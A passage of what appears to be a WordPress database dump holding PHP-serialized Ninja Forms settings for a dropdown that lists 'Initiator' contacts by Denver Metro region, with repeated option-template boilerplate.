Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:40:\"Initiator-Mary Griggs-Denver Metro West \";s:5:\"value\";s:39:\"initiator-mary-griggs-denver-metro-west\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:19;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"Initiator-Renee Wholey-Denver Metro West \";s:5:\"value\";s:40:\"initiator-renee-wholey-denver-metro-west\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:14:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:44:\"ESA/Initiator-Fred Bell-Denver Metro Central\";s:5:\"value\";s:44:\"esa-initiator-fred-bell-denver-metro-central\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:49:\"ESA/Initiator-Gordon Garland-Denver Metro Central\";s:5:\"value\";s:24:\"Initiator-Vickie Cashman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:52:\"ESA/Initiator-Bette Jean Wagner-Denver Metro Central\";s:5:\"value\";s:52:\"ESA-Initiator-bette-jean-wagner-denver-metro-central\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:46:\"ESA/Initiator-James Fischer-Denver Metro North\";s:5:\"value\";s:46:\"ESA-Initiator-James Fischer-Denver Metro North\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"6\";s:12:\"manual_value\";b:1;}i:5;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:6;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"Initiator-Lura Fischer-Denver Metro North\";s:5:\"value\";s:41:\"initiator-lura-fischer-denver-metro-north\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:46:\"ESA/Initiator-Lura Lee Genz-Denver Metro North\";s:5:\"value\";s:46:\"ESA-Initiator-Lura Lee Genz-Denver Metro North\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"ESA/Initiator-Tim Kuss-Denver Metro South\";s:5:\"value\";s:41:\"esa-initiator-tim-kuss-denver-metro-south\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:43:\"ESA/Initiator-Jack Lile-Denver Metro South \";s:5:\"value\";s:43:\"ESA-Initiator-Jack Lile-Denver Metro South \";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:12;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:43:\"ESA/Initiator-Raelin Harp-Denver Metro East\";s:5:\"value\";s:43:\"esa-initiator-raelin-harp-denver-metro-east\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:26:\"ESA/Initiator-Linda Bowman\";s:5:\"value\";s:26:\"ESA-Initiator-Linda Bowman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:14;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:30:\"ESA/Initiator-Rolf Mueller-Uri\";s:5:\"value\";s:29:\"ESAInitiator-Rolf Mueller-Uri\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:40:\"Initiator-Mary Griggs-Denver Metro West \";s:5:\"value\";s:39:\"initiator-mary-griggs-denver-metro-west\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:19;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"Initiator-Renee Wholey-Denver Metro West 